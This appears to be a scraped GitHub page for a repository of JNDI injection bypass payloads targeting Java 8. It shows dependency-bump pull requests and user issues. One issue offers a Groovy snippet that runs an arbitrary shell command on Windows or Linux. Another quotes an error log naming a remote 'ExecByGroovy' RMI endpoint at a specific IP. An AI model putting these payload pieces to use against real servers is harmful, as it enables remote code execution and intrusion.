JNDI-Injection-Bypass
JNDI-Injection-Bypass copied to clipboard
welk1n
Some payloads of JNDI Injection in JDK 1.8.0_191+
Bumps [groovy](https://github.com/apache/groovy) from 2.4.5 to 2.4.21. Commits See full diff in compare view [](https://docs.github.com/en/github/managing-security-vulnerabilities/about-dependabot-security-updates#about-compatibility-scores) Dependabot will resolve any conflicts with this PR as long as you don't alter...
![dependabot[bot] avatar](https://avatars.githubusercontent.com/in/29110?v=4 "dependabot[bot] avatar"){kind=avatar}
在参考您的代码进行测试时,测试失败,仔细看了下,发现您的payload似乎只能针对linux,所以我在windows下进行测试自然无法测试成功。但是通过搜索资料,我发现似乎有一种更为通用的方法,可以兼容windows,代码如下,希望对您有用 ``` if (System.properties['os.name'].toLowerCase().contains('windows')) { ['cmd','/C', '${cmd}'].execute(); } else { ['/bin/sh','-c', '${cmd}'].execute(); } ``` 参考链接: https://my.oschina.net/jjyuangu/blog/1815945 https://stackoverflow.com/questions/4689240/detecting-the-platform-window-or-linux-by-groovy-grails
在tomcat8测试ok,在tomcat7下,显示: otSwappableTargetSource for target: String[BeanDefinitionStoreException: Invalid bean definition with name 'rmi://182.92.151.151:1097/ExecByGroovy' defined in JNDI environment: JNDI lookup failed; nested exception is javax.naming.NamingException: No set method found for property: forceString] =...
Bumps [junit](https://github.com/junit-team/junit4) from 4.12 to 4.13.1. Release notes Sourced from junit's releases. JUnit 4.13.1 Please refer to the release notes for details. JUnit 4.13 Please refer to the release notes...